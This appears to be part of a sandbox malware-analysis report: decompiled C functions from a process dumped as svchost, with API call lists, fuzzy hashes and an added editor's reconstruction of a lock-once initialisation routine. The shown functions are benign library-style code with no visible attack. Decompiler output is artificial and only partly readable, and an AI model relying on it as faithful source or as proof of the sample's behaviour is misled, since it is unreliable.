    • API String ID: 1902064621-0
    • Opcode ID: c1f0a037787ab0202993814b43c3c3525385f6dd9a9de1a02aa3b4a22ab55705
    • Instruction ID: 81c24fc35da97b50ac7cd1b77676c273c49e8e3efeb54ae759e7f93a53c550ef
    • Opcode Fuzzy Hash: c1f0a037787ab0202993814b43c3c3525385f6dd9a9de1a02aa3b4a22ab55705
    • Instruction Fuzzy Hash: 9901AD32400219BFCB216F64DC09FEF3BA8EF04714F044936BA25A61A0DBB4D960CBC8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 42%
    			E004804CA(void* __ecx) {
    				long _t1;
    				long _t4;
    				long _t10;
    				void* _t11;
    
    				_t1 =  *0x4e1ba8; // 0x2
    				_t11 = __ecx;
    				_t10 = 2;
    				if(_t1 != _t10) {
    					__eflags = _t1;
    					if(_t1 != 0) {
    						while(1) {
    							L7:
    							__eflags =  *0x4e1ba8 - 1;
    							if( *0x4e1ba8 != 1) {
    								break;
    							}
    							Sleep(1);
    						}
    						__eflags =  *0x4e1ba8 - _t10; // 0x2
    						if(__eflags != 0) {
    							L12:
    							return _t11;
    						}
    						L10:
    						_push(0x4e1b90);
    						L11:
    						 *0x49224c();
    						goto L12;
    					}
    					_t4 = InterlockedExchange(0x4e1ba8, 1);
    					__eflags = _t4;
    					if(__eflags != 0) {
    						__eflags = _t4 - _t10;
    						if(_t4 == _t10) {
    							 *0x4e1ba8 = _t10;
    						}
    						goto L7;
    					}
    					 *0x492298(0x4e1b90);
    					E004719EB(__eflags, E00480548);
    					 *0x4e1ba8 = _t10;
    					goto L10;
    				}
    				_push(0x4e1b90);
    				goto L11;
    			}

    Instruction addresses for the decompiled statements above, in order: 0x004804ca 0x004804d4 0x004804d6 0x004804d9 0x004804e2 0x004804e9 0x00480520 0x00480520 0x00480520 0x00480527 0x00000000 0x00000000 0x0048052b 0x0048052b 0x00480533 0x00480539 0x00480542 0x00480547 0x00480547 0x0048053b 0x0048053b 0x0048053c 0x0048053c 0x00000000 0x0048053c 0x004804f2 0x004804f8 0x004804fa 0x00480516 0x00480518 0x0048051a 0x0048051a 0x00000000 0x00480518 0x004804fd 0x00480508 0x0048050e 0x00000000 0x0048050e 0x004804db 0x00000000

    APIs
    • InterlockedExchange.KERNEL32(004E1BA8,00000001), ref: 004804F2
    • RtlInitializeCriticalSection.NTDLL(004E1B90), ref: 004804FD
    • RtlEnterCriticalSection.NTDLL(004E1B90), ref: 0048053C
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: the same eleven dump regions (bases 0x400000 through 0x50A000) listed for E00478DBA above
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: CriticalSection$EnterExchangeInitializeInterlocked
    • String ID:
    • API String ID: 3643093385-0
    • Opcode ID: ccfbb566fb34b1dabfdecdeb917c75ae0d5000d8a0e27e5d334f344a5e6eca3d
    • Instruction ID: 4e39601ea56557fc0ee243e34feb105befa07c5858b6b76e72c31ced4062fb10
    • Opcode Fuzzy Hash: ccfbb566fb34b1dabfdecdeb917c75ae0d5000d8a0e27e5d334f344a5e6eca3d
    • Instruction Fuzzy Hash: 24F0A4B1B90250BFC761A759BDC566F3654E7507A3B300837F14584573E2B858898B2D
    Uniqueness

    Uniqueness Score: -1.00%
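The control flow of E004804CA above is a lazy one-time initialisation of a critical section guarded by a three-state flag. The following is an added example (editor-written C on C11 atomics and pthreads, not code from the sample or from the Joe Sandbox report) that reconstructs that protocol so its branches can be exercised. It assumes that *0x4e1ba8 holds 0 (untouched), 1 (initialisation in progress) or 2 (ready), that 0x4e1b90 is the CRITICAL_SECTION the two NTDLL calls in the APIs list operate on, and that *0x492298 and *0x49224c are the import thunks for RtlInitializeCriticalSection and RtlEnterCriticalSection, as the ref addresses 004804FD and 0048053C indicate. The call E004719EB(E00480548) on the initialising path is not reproduced because the page does not show what it does; the mutex, worker thread and counters are the example's own.

```c
#include <pthread.h>
#include <sched.h>
#include <stdatomic.h>
#include <stdio.h>

/* Reconstruction of the one-time initialisation protocol in E004804CA.
 *   g_state      stands in for *0x4e1ba8: 0 = untouched, 1 = initialising, 2 = ready
 *   g_lock       stands in for the CRITICAL_SECTION at 0x4e1b90
 *   g_init_calls counts how many threads actually ran the initialisation (example only)
 * The sample's E004719EB(E00480548) call on the init path is omitted; the page
 * does not show what it does. */
static atomic_int g_state = 0;
static pthread_mutex_t g_lock;
static atomic_int g_init_calls = 0;

/* Enter the lock, initialising it first if nobody has yet. Returns 1 when the
 * lock was entered, 0 on the path where the original returns without entering. */
int lock_once_enter(void) {
    int s = atomic_load(&g_state);
    if (s == 2) {                                 /* fast path: already ready */
        pthread_mutex_lock(&g_lock);              /* RtlEnterCriticalSection(0x4e1b90) */
        return 1;
    }
    if (s == 0) {
        int old = atomic_exchange(&g_state, 1);   /* InterlockedExchange(0x4e1ba8, 1) */
        if (old == 0) {                           /* we won the race: do the init */
            pthread_mutex_init(&g_lock, NULL);    /* RtlInitializeCriticalSection(0x4e1b90) */
            atomic_fetch_add(&g_init_calls, 1);
            atomic_store(&g_state, 2);
            pthread_mutex_lock(&g_lock);          /* L10/L11: enter right away */
            return 1;
        }
        if (old == 2) {
            /* Our exchange overwrote a completed init with 1; put 2 back so
             * waiters do not spin forever (the "if(_t4 == _t10)" branch). */
            atomic_store(&g_state, 2);
        }
        /* old == 1: another thread is initialising; wait with everyone else */
    }
    while (atomic_load(&g_state) == 1) {          /* the Sleep(1) loop at L7 */
        sched_yield();
    }
    if (atomic_load(&g_state) != 2) {
        return 0;                                 /* L12 reached without entering */
    }
    pthread_mutex_lock(&g_lock);
    return 1;
}

static void *worker(void *arg) {
    (void)arg;
    if (lock_once_enter()) {
        pthread_mutex_unlock(&g_lock);            /* the sample's matching leave is not on this page */
    }
    return NULL;
}

/* Push n threads through lock_once_enter at once and report how many of them
 * performed the initialisation; the protocol guarantees exactly one. */
int lock_once_demo(int n) {
    pthread_t th[64];
    if (n > 64) n = 64;
    if (n < 1) n = 1;
    for (int i = 0; i < n; i++) pthread_create(&th[i], NULL, worker, NULL);
    for (int i = 0; i < n; i++) pthread_join(th[i], NULL);
    return atomic_load(&g_init_calls);
}

int lock_once_state(void) { return atomic_load(&g_state); }

int main(void) {
    printf("initialisation ran %d time(s); state = %d\n",
           lock_once_demo(16), lock_once_state());
    return 0;
}
```

The branch that writes 2 back after the exchange is the interesting one: a thread that read state 0 before the winner finished can still execute InterlockedExchange after the state has become 2, clobbering it with 1. Without the restore, every later caller would spin in the Sleep(1) loop indefinitely; with it, the window in which callers see 1 lasts only until the write, and the waiters then proceed. Note also that the exchange is a plain swap, not a compare-and-swap, which is why this repair step is needed at all.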

    C-Code - Quality: 100%
    			E00486A53(struct HDC__* _a4, struct HWND__* _a8, intOrPtr _a12, void* _a16, long _a20) {
    				long _v12;
    				void _v16;
    				intOrPtr _t12;
    				long _t16;
    				void* _t18;
    
    				if(_a4 == 0 || _a16 == 0) {
    					L10:
    					return 0;
    				} else {
    					_t12 = _a12;
    					if(_t12 == 1 || _t12 == 0 || _t12 == 5 || _t12 == 2 && E0048A70B(_a8, _t12) == 0) {
    						goto L10;
    					} else {
    						GetObjectA(_a16, 0xc,  &_v16);
    						SetBkColor(_a4, _v12);
    						_t16 = _a20;
    						if(_t16 == 0xffffffff) {
    							_t16 = GetSysColor(8);
    						}
    						SetTextColor(_a4, _t16);
    						_t18 = 1;
    						return _t18;
    					}
    				}
    			}

    Instruction addresses for the decompiled statements above, in order: 0x00486a5d 0x00486ac2 0x00000000 0x00486a65 0x00486a65 0x00486a6b 0x00000000 0x00486a88 0x00486a91 0x00486a9d 0x00486aa3 0x00486aa9 0x00486aad 0x00486aad 0x00486ab7 0x00486abf 0x00000000 0x00486abf 0x00486a6b

    APIs
    • GetObjectA.GDI32(00000000,0000000C,?), ref: 00486A91
    • SetBkColor.GDI32(00000000,00000000), ref: 00486A9D
    • GetSysColor.USER32(00000008), ref: 00486AAD
    • SetTextColor.GDI32(00000000,?), ref: 00486AB7
      • Part of subcall function 0048A70B: GetWindowLongA.USER32(00000000,000000F0), ref: 0048A71C
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: the same eleven dump regions (bases 0x400000 through 0x50A000) listed for E00478DBA above
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Color$LongObjectTextWindow
    • String ID:
    • API String ID: 2871169696-0
    • Opcode ID: c991e7d205f50740ca1eeda512537c850dd80f9a50ad46094ddb37b864c6fe7d
    • Instruction ID: c60d0f58e8658631c0d6e0d9dfd32f0930c820a56c3c23e2d05e1883efd39c4f
    • Opcode Fuzzy Hash: c991e7d205f50740ca1eeda512537c850dd80f9a50ad46094ddb37b864c6fe7d
    • Instruction Fuzzy Hash: 23014F30200105BBDF65BF64DD4AAAF3B65EB51310F198923FA02E51E0D774CD94DB69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 37%
    			E0048A7F5(struct HWND__* _a4, CHAR* _a8) {
    				char _v260;
    				void* _t14;
    				void* _t15;
    
    				_t15 =  *0x4922a0(_a8);
    				if(_t15 > 0x100 || GetWindowTextA(_a4,  &_v260, 0x100) != _t15) {
    					L3:
    					return SetWindowTextA(_a4, _a8);
    				}
    				_t14 =  *0x4921e8( &_v260, _a8);
    				if(_t14 != 0) {
    					goto L3;
    				}
    				return _t14;
    			}

    Instruction addresses for the decompiled statements above, in order: 0x0048a808 0x0048a811 0x0048a83c 0x00000000 0x0048a842 0x0048a832 0x0048a83a 0x00000000 0x00000000 0x0048a84a

    APIs
    • lstrlen.KERNEL32(?), ref: 0048A802
    • GetWindowTextA.USER32(?,?,00000100), ref: 0048A81E
    • lstrcmp.KERNEL32(?,?), ref: 0048A832
    • SetWindowTextA.USER32(?,?), ref: 0048A842
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: the same eleven dump regions (bases 0x400000 through 0x50A000) listed for E00478DBA above
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: TextWindow$lstrcmplstrlen
    • String ID:
    • API String ID: 330964273-0
    • Opcode ID: 8e7ca9a6d953eec7e64d53873335e36ba026792355cb3a0b71570709f4f91370
    • Instruction ID: a4c17f6407644a08ebcce104e4a9e21521ec9d802d9e84b5c791187faed74faf
    • Opcode Fuzzy Hash: 8e7ca9a6d953eec7e64d53873335e36ba026792355cb3a0b71570709f4f91370
    • Instruction Fuzzy Hash: 56F0F871400018BBDF227F24EC08ADE7B6DEB28391F048073F959E1161D7B4DAA5DBA9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E00419090(void* __ecx, void* __eflags) {
    				void* _t122;
    				intOrPtr* _t127;
    				void* _t129;
    				signed int _t145;
    				void* _t151;
    				intOrPtr _t153;
    				void* _t154;
    
    				_push(0xffffffff);
    				_push(E0048E758);
    				_push( *[fs:0x0]);
    				 *[fs:0x0] = _t153;
    				_t154 = _t153 - 0x58;
    				_t122 = E00417F60(__ecx,  *((intOrPtr*)(_t154 + 0x68)), 0);
    				_t145 =  *(_t154 + 0x80);
    				_t151 = _t122;
    				E0040B5D0(_t154 + 0x18);
    				 *((intOrPtr*)(_t154 + 0x70)) = 0;
    				 *((intOrPtr*)(_t154 + 0x10)) = 0;
    				 *((intOrPtr*)(_t154 + 0x14)) = 0;
    				if( *((short*)( *((intOrPtr*)(_t151 + 0x28)) + (_t145 + _t145 * 4) * 4 + 0xc)) + 0xfffffc18 > 0x18) {
    					L45:
    					_t127 =  *((intOrPtr*)(_t151 + 0x2c))(4);
    					 *_t127( *((intOrPtr*)(_t154 + 0x7c)), _t145, _t154 + 0x10, 0);
    					 *((intOrPtr*)(_t154 + 0x70)) = 0xffffffff;
    					 *((intOrPtr*)(_t154 + 0x18)) = 0x495e50;
    					_t129 = E0040B7D0(_t154 + 0x18);
    					 *[fs:0x0] =  *((intOrPtr*)(_t154 + 0x68));
    					return _t129;
    				}
    				switch( *((intOrPtr*)(0 +  &M00419464))) {
    					case 0:
    						 *((intOrPtr*)(_t154 + 0x10)) =  *((intOrPtr*)(_t154 + 0x88));
    						goto L45;
    					case 1:
    						__edx =  *(__esp + 0x88);
    						__eax =  *(__esp + 0x8c);
    						 *(__esp + 0x10) =  *(__esp + 0x88);
    						 *(__esp + 0x14) =  *(__esp + 0x8c);
    						goto L45;
    					case 2:
    						__eax =  *(__esp + 0x88);
    						__ecx = 0;
    						__eflags =  *(__esp + 0x88);
    						__ecx = 0 |  *(__esp + 0x88) != 0x00000000;
    						 *(__esp + 0x10) = __ecx;
    						goto L45;
    					case 3:
    						__eax =  *(__esp + 0x88);
    						__eflags = __eax;
    						if(__eax != 0) {
    							 *(__esp + 0x10) = __eax;
    						} else {
    							 *(__esp + 0x10) = 0x4c93a8;
    						}
    						goto L45;
    					case 4:
    						__eax =  *(__esp + 0x88);
    						__ecx = 0;
    						__eflags = __eax;
    						0 | __eflags < 0x00000000 = (__eflags < 0) - 1;
    						__ecx = (__eflags < 0x00000000) - 0x00000001 & __eax;
    						 *(__esp + 0x10) = __ecx;
    						goto L45;
    					case 5:
    						__ecx =  *(__esp + 0x88);
    						__eflags = __ecx;
    						if(__ecx != 0) {
    							__eax =  *(__ecx + 4);
    							 *(__esp + 0x14) = __eax;
    							__eflags =  *((short*)(__esi + 0xc)) - 0x3f3;
    							if( *((short*)(__esi + 0xc)) != 0x3f3) {
    								L15:
    								__ecx = __ecx + 8;
    								 *(__esp + 0x10) = __ecx;
    								goto L45;
    							}
    							__eflags = __eax - 4;
    							if(__eax < 4) {
    								goto L15;
    							}
    							__ecx = __ecx + 8;
    							_push(__eax);
    							__ecx = __esp + 0x20;
    							__eax = E0040BD00(__ecx, __ecx);
    							__esi =  *(__esp + 0x28);
    							__eax =  *(__esp + 0x20);
    							__esi =  ~( *(__esp + 0x28));
    							asm("sbb esi, esi");
    							__esi =  ~( *(__esp + 0x28)) &  *(__esp + 0x20);
    							__edx =  *__esi;
    							 *__esi = E0041FD60( *__esi);
    							 *(__esp + 0x10) = __esi;
    							goto L45;
    						}
    						 *(__esp + 0x10) = 0;
    						 *(__esp + 0x14) = 0;
    						goto L45;
    					case 6:
    						__ebx =  *(__esp + 0x84);
    						__eflags = __ebx - 0xffffffff;
    						if(__ebx == 0xffffffff) {
    							__edx =  *(__esp + 0x88);
    							__eflags = __edx;
    							if(__edx == 0) {
    								goto L45;
    							}
    							__ecx = 0xf;
    							__eax = 0;
    							__edi = __esp + 0x2c;
    							__esi = __edx + 4;
    							__eax = memset(__edi, 0, 0xf << 2);
    							__edi = __edi + __ecx;
    							0 =  *__esi;
    							__eax =  *__edx;
    							__ecx =  ~( *__esi);
    							asm("sbb ecx, ecx");
    							__esi = __esi + 4;
    							 *(__esp + 0x34) = __eax;
    							 *(__esp + 0x38) = __eax;
    							__eax =  *__esi;
    							__edi =  *(__esi + 4);
    							__ecx = __ecx & 0x000002bc;
    							__eflags = __eax;
    							__edx = __edx & 0xffffff00 | __eax != 0x00000000;
    							__esi = __esi + 4;
    							 *(__esp + 0x3c) = __ecx;
    							__eflags = __edi;
    							__ecx =  *(__esi + 4);
    							 *((char*)(__esp + 0x40)) = __dl;
    							__eax = __eax & 0xffffff00 | __edi != 0x00000000;
    							__esi = __esi + 4;
    							 *((char*)(__esp + 0x42)) = __al;
    							__eflags = __ecx;
    							__eax =  *(__esi + 4);
    							__ecx = __ecx & 0xffffff00 | __ecx != 0x00000000;
    							__esi = __esi + 4;
    							__edx = 0;
    							__eflags = __eax;
    							__edx = 0 | __eflags < 0x00000000;
    							__edx = (__eflags < 0) - 1;
    							 *((char*)(__esp + 0x41)) = __cl;
    							_push(__eax);
    							__eax = __esp + 0x30;
    							_push(__esp + 0x30);
    							__eax = E00420460(__edx, __eflags);
    							__esi = __esi + 4;
    							__esp = __esp + 8;
    							__esi =  *__esi;
    							__eflags = __esi;
    							if(__esi == 0) {
    								L41:
    								__edx = __esp + 0x48;
    								__edi = 0x4aceb4;
    								L42:
    								__ecx = __ecx | 0xffffffff;
    								__eax = 0;
    								asm("repne scasb");
    								__ecx =  !__ecx;
    								__edi = __edi - __ecx;
    								__eflags = __edi;
    								__esi = __edi;
    								__eax = __ecx;
    								__edi = __edx;
    								L43:
    								__ecx = __ecx >> 2;
    								__eax = memcpy(__edi, __esi, __ecx << 2);
    								__edi = __esi + __ecx;
    								__edi = __esi + __ecx + __ecx;
    								0 = __eax;
    								__ecx = __eax & 0x00000003;
    								__eflags = __ecx;
    								__eax = memcpy(__edi, __esi, __ecx);
    								__esi + __ecx = __esi + __ecx + __ecx;
    								__ecx = 0;
    								L44:
    								__edi =  *(__esp + 0x80);
    								__ecx = __esp + 0x2c;
    								 *(__esp + 0x10) = __ecx;
    								 *(__esp + 0x14) = 0x3c;
    								goto L45;
    							}
    							__eax = E0040C020(__ecx, __esi);
    							__eflags = __eax - 0x20;
    							if(__eax >= 0x20) {
    								goto L41;
    							}
    							__edx = __esp + 0x48;
    							__edi = __esi;
    							goto L42;
    						}
    						_push(6);
    						__eax =  *((intOrPtr*)(__ebp + 0x2c))();
    						__edx =  *(__esp + 0x7c);
    						__ecx = __esp + 0x10;
    						_push(__ecx);
    						_push(__edi);
    						_push(__edx);
    						__eax =  *__eax();
    						__eflags = __eax;
    						if(__eax == 0) {
    							L20:
    							__eax = __esp + 0x2c;
    							GetStockObject(0x11) = GetObjectA(__eax, 0x3c, __esp + 0x2c);
    							L21:
    							__eflags = __ebx - 6;
    							if(__ebx > 6) {
    								goto L44;
    							}
    							switch( *((intOrPtr*)(__ebx * 4 +  &M004194A0))) {
    								case 0:
    									__eax =  *(__esp + 0x88);
    									__ecx = 0xe10;
    									asm("cdq");
    									_t59 = __eax % 0xe10;
    									__eax = __eax / 0xe10;
    									__edx = _t59;
    									__eflags = __edx;
    									if(__edx < 0) {
    										__edx = __edx + 0xe10;
    										__eflags = __edx;
    									}
    									 *(__esp + 0x34) = __edx;
    									 *(__esp + 0x38) = __edx;
    									goto L44;
    								case 1:
    									 *(__esp + 0x88) =  ~( *(__esp + 0x88));
    									asm("sbb edx, edx");
    									__edx =  ~( *(__esp + 0x88)) & 0x000002bc;
    									 *(__esp + 0x3c) =  ~( *(__esp + 0x88)) & 0x000002bc;
    									goto L44;
    								case 2:
    									__eax =  *(__esp + 0x88);
    									__eflags = __eax;
    									__eax = __eax & 0xffffff00 | __eax != 0x00000000;
    									 *((char*)(__esp + 0x40)) = __al;
    									goto L44;
    								case 3:
    									__eax =  *(__esp + 0x88);
    									__eflags =  *(__esp + 0x88);
    									__ecx = __ecx & 0xffffff00 |  *(__esp + 0x88) != 0x00000000;
    									 *((char*)(__esp + 0x42)) = __cl;
    									goto L44;
    								case 4:
    									__eax =  *(__esp + 0x88);
    									__eflags =  *(__esp + 0x88);
    									__edx = __edx & 0xffffff00 |  *(__esp + 0x88) != 0x00000000;
    									 *((char*)(__esp + 0x41)) = __dl;
    									goto L44;
    								case 5:
    									__eax =  *(__esp + 0x88);
    									__ecx = 0;
    									__eflags = __eax;
    									0 | __eflags < 0x00000000 = (__eflags < 0) - 1;
    									__edx = __esp + 0x2c;
    									__ecx = (__eflags < 0x00000000) - 0x00000001 & __eax;
    									_push((__eflags < 0x00000000) - 0x00000001 & __eax);
    									_push(__edx);
    									__eax = E00420460(__edx, __eflags);
    									__esp = __esp + 8;
    									goto L44;
    								case 6:
    									__edx =  *(__esp + 0x88);
    									__eflags = __edx;
    									if(__edx == 0) {
    										__edx = 0x4c93a8;
    									}
    									__edi = __edx;
    									__ecx = __ecx | 0xffffffff;
    									__eax = 0;
    									asm("repne scasb");
    									__ecx =  !__ecx;
    									__ecx = __ecx - 1;
    									__eflags = __ecx;
    									if(__ecx <= 0) {
    										L35:
    										__edx = 0x4aceb4;
    										goto L36;
    									} else {
    										__eflags = __ecx - 0x20;
    										if(__ecx < 0x20) {
    											L36:
    											__edi = __edx;
    											__ecx = __ecx | 0xffffffff;
    											__eax = 0;
    											__ebx = __esp + 0x48;
    											asm("repne scasb");
    											__ecx =  !__ecx;
    											__edi = __edx - __ecx;
    											__esi = __edx - __ecx;
    											__eax = __ecx;
    											__edi = __esp + 0x48;
    											goto L43;
    										}
    										goto L35;
    									}
    							}
    						}
    						__eflags =  *(__esp + 0x14) - 0x3c;
    						if( *(__esp + 0x14) != 0x3c) {
    							goto L20;
    						}
    						__esi =  *(__esp + 0x10);
    						__ecx = 0xf;
    						__edi = __esp + 0x2c;
    						__eax = memcpy(__esp + 0x2c, __esi, 0xf << 2);
    						__esi + __ecx = __esi + __ecx + __ecx;
    						__ecx = 0;
    						goto L21;
    					case 7:
    						__ecx =  *(__esp + 0x88);
    						 *(__esp + 0x10) = __ecx;
    						goto L45;
    				}
    			}

    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID: <
    • API String ID: 0-4251816714
    • Opcode ID: 71fd6dbcf1554d1fff94cecde06319b6cc37daa3b6e6919ac9eea0c471f262a1
    • Instruction ID: 3a40b3e054403b7abf586a1d7e608c87f9994c74dbdcf85384208a99a2f24902
    • Opcode Fuzzy Hash: 71fd6dbcf1554d1fff94cecde06319b6cc37daa3b6e6919ac9eea0c471f262a1
    • Instruction Fuzzy Hash: 25B195715087419FD728CF24D890AABB7E5BBC5310F148A2EF59AD7380DB34DD468B86
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E00414900(intOrPtr* __ecx, void* __ebp) {
    				char _v8;
    				intOrPtr* _v16;
    				intOrPtr _v20;
    				intOrPtr _t85;
    				intOrPtr _t97;
    				void* _t114;
    				intOrPtr* _t115;
    				intOrPtr* _t116;
    				intOrPtr* _t117;
    				intOrPtr* _t118;
    				intOrPtr* _t119;
    				intOrPtr* _t120;
    				intOrPtr* _t121;
    				intOrPtr* _t122;
    				intOrPtr* _t123;
    				intOrPtr* _t124;
    				intOrPtr* _t125;
    				intOrPtr* _t127;
    				intOrPtr* _t128;
    				intOrPtr _t131;
    				intOrPtr _t143;
    				intOrPtr _t159;
    				void* _t160;
    				void* _t163;
    				intOrPtr* _t164;
    				intOrPtr _t167;
    
    				 *[fs:0x0] = _t167;
    				_t164 = __ecx;
    				_v16 = __ecx;
    				E0048CDC2(__ecx, 0, 0);
    				_t85 =  *0x4b8924; // 0x4b8938
    				_v8 = 0;
    				 *((intOrPtr*)(__ecx + 0xd0)) = _t85;
    				_t131 =  *0x4b8924; // 0x4b8938
    				 *((intOrPtr*)(__ecx + 0xd4)) = _t131;
    				_t159 =  *0x4b8924; // 0x4b8938
    				 *((intOrPtr*)(__ecx + 0xd8)) = _t159;
    				_v8 = 3;
    				E004823A4(__ecx + 0xdc);
    				_v8 = 4;
    				E004823A4(__ecx + 0xf0);
    				E0040B5D0(__ecx + 0x10c);
    				 *((intOrPtr*)(__ecx + 0x108)) = 0;
    				 *((intOrPtr*)(__ecx + 0x104)) = 0x496038;
    				_t115 = __ecx + 0x120;
    				E0040B5D0(_t115);
    				 *_t115 = 0x495ea0;
    				_t116 = __ecx + 0x134;
    				E0040B5D0(_t116);
    				 *_t116 = 0x495ea0;
    				_t117 = __ecx + 0x148;
    				E0040B5D0(_t117);
    				 *_t117 = 0x495ea0;
    				_t118 = __ecx + 0x15c;
    				E0040B5D0(_t118);
    				 *_t118 = 0x495ea0;
    				_t119 = __ecx + 0x170;
    				E0040B5D0(_t119);
    				 *_t119 = 0x495ea0;
    				_t120 = __ecx + 0x184;
    				E0040B5D0(_t120);
    				 *_t120 = 0x495ea0;
    				_t121 = __ecx + 0x1a0;
    				E0040B5D0(_t121);
    				 *_t121 = 0x495ea0;
    				_v8 = 0xd;
    				E004823A4(__ecx + 0x1b4);
    				_t97 =  *0x4b8924; // 0x4b8938
    				 *((intOrPtr*)(__ecx + 0x1cc)) = _t97;
    				_t143 =  *0x4b8924; // 0x4b8938
    				 *((intOrPtr*)(__ecx + 0x1d0)) = _t143;
    				_t122 = __ecx + 0x1ec;
    				E0040B5D0(_t122);
    				 *_t122 = 0x495ea0;
    				_t123 = __ecx + 0x200;
    				E0040B5D0(_t123);
    				 *_t123 = 0x495ea0;
    				_t124 = __ecx + 0x214;
    				E0040B5D0(_t124);
    				 *_t124 = 0x495ea0;
    				_t125 = __ecx + 0x22c;
    				E0040B5D0(_t125);
    				 *_t125 = 0x495ea0;
    				E0040B5D0(__ecx + 0x240);
    				E0040B5D0(__ecx + 0x254);
    				E0040B5D0(__ecx + 0x268);
    				E0040B5D0(__ecx + 0x290);
    				_v8 = 0x18;
    				E00427F20(__ecx + 0x2a4);
    				_v8 = 0x19;
    				E00433C80(__ecx + 0x354);
    				 *((intOrPtr*)(_t164 + 0x374)) = 0;
    				 *((intOrPtr*)(_t164 + 0x370)) = 0x496034;
    				 *((intOrPtr*)(_t164 + 0x378)) = 0;
    				 *((intOrPtr*)(_t164 + 0x37c)) = 0;
    				 *((intOrPtr*)(_t164 + 0x384)) = 0x496034;
    				 *((intOrPtr*)(_t164 + 0x388)) = 0;
    				 *((intOrPtr*)(_t164 + 0x38c)) = 0;
    				 *((intOrPtr*)(_t164 + 0x390)) = 0;
    				_v8 = 0x1c;
    				E0042A4D0(_t164 + 0x394);
    				_v8 = 0x1d;
    				E00482344(_t164 + 0x3a4);
    				 *((intOrPtr*)(_t164 + 0x3b8)) = 0x496034;
    				 *((intOrPtr*)(_t164 + 0x3bc)) = 0;
    				 *((intOrPtr*)(_t164 + 0x3c0)) = 0;
    				 *((intOrPtr*)(_t164 + 0x3c4)) = 0;
    				_t127 = _t164 + 0x3c8;
    				_v8 = 0x1f;
    				E00484873(_t127);
    				 *_t127 = 0x495f7c;
    				_t128 = _t164 + 0x410;
    				E0040B5D0(_t128);
    				 *_t128 = 0x495ea0;
    				 *_t164 = 0x495ee0;
    				 *((intOrPtr*)(_t164 + 0x108)) = _t164;
    				 *((intOrPtr*)(_t164 + 0x19c)) = 0;
    				 *((intOrPtr*)(_t164 + 0x198)) = 0;
    				 *((intOrPtr*)(_t164 + 0x428)) = 0;
    				 *((intOrPtr*)(_t164 + 0x424)) = 0;
    				 *((intOrPtr*)(_t164 + 0x1d4)) = 0;
    				 *((intOrPtr*)(_t164 + 0x1d8)) = 0;
    				 *((intOrPtr*)(_t164 + 0x1e0)) = 0;
    				 *((intOrPtr*)(_t164 + 0x1dc)) = 0;
    				 *((intOrPtr*)(_t164 + 0x1e8)) = 0;
    				 *((intOrPtr*)(_t164 + 0x1e4)) = 0;
    				 *((intOrPtr*)(_t164 + 0x280)) = 0;
    				 *((intOrPtr*)(_t164 + 0x27c)) = 0;
    				 *((intOrPtr*)(_t164 + 0x284)) = 0;
    				 *((intOrPtr*)(_t164 + 0x28c)) = 0;
    				 *((intOrPtr*)(_t164 + 0x288)) = 0;
    				 *((intOrPtr*)(_t164 + 0x380)) = 0;
    				 *((intOrPtr*)(_t164 + 0x3a0)) = 0;
    				 *((intOrPtr*)(_t164 + 0x404)) = 0;
    				 *((intOrPtr*)(_t164 + 0x408)) = 0;
    				 *((intOrPtr*)(_t164 + 0x40c)) = 0;
    				 *((intOrPtr*)(_t164 + 0xc4)) = 0;
    				 *((intOrPtr*)(_t164 + 0xc8)) = 0;
    				 *((intOrPtr*)(_t164 + 0xcc)) = 0;
    				 *((intOrPtr*)(_t164 + 0x228)) = 0;
    				 *((intOrPtr*)(_t164 + 0x42c)) = 0;
    				 *((intOrPtr*)(_t164 + 0x1c8)) = 0;
    				 *0x492298(0x4c9e70, _t160, _t163, _t114, __ecx,  *[fs:0x0], E0048E40A, 0xffffffff);
    				 *[fs:0x0] = _v20;
    				return _t164;
    			}

    APIs
      • Part of subcall function 0048CDC2: __EH_prolog.LIBCMT ref: 0048CDC7
      • Part of subcall function 0048CDC2: GetCurrentThread.KERNEL32 ref: 0048CE15
      • Part of subcall function 0048CDC2: GetCurrentThreadId.KERNEL32 ref: 0048CE1E
      • Part of subcall function 00427F20: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,0041AA38), ref: 00427F95
